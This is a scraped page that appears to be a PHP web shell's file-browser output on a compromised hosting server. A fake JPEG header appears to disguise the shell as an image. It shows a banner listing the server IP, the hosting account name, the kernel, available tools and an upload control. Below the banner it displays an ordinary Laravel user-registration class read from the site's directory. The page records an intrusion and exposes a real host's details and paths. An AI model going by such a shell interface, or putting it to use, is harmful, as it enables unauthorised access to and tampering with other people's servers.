����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.22.242.214 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/cbt.bofirm.com/app/Actions/Fortify/ |
Upload File : |
<?php namespace App\Actions\Fortify; use App\Models\User; use Illuminate\Support\Facades\Hash; use Illuminate\Support\Facades\Validator; use Laravel\Fortify\Contracts\CreatesNewUsers; use Laravel\Jetstream\Jetstream; class CreateNewUser implements CreatesNewUsers { use PasswordValidationRules; /** * Validate and create a newly registered user. * * @param array $input * @return \App\Models\User * @throws \Illuminate\Validation\ValidationException */ public function create(array $input) { Validator::make($input, [ 'first_name' => ['required', 'string', 'max:60'], 'last_name' => ['required', 'string', 'max:60'], 'user_name' => ['required', 'string', 'max:60', 'unique:users'], 'email' => ['required', 'string', 'email', 'max:255', 'unique:users'], 'password' => $this->passwordRules(), 'terms' => Jetstream::hasTermsAndPrivacyPolicyFeature() ? ['required', 'accepted'] : '', ])->validate(); $user = User::create([ 'first_name' => $input['first_name'], 'last_name' => $input['last_name'], 'user_name' => $input['user_name'], 'email' => $input['email'], 'password' => Hash::make($input['password']), ]); // By default assign guest role to new user if($user) { $user->assignRole('Guest'); } return $user; } }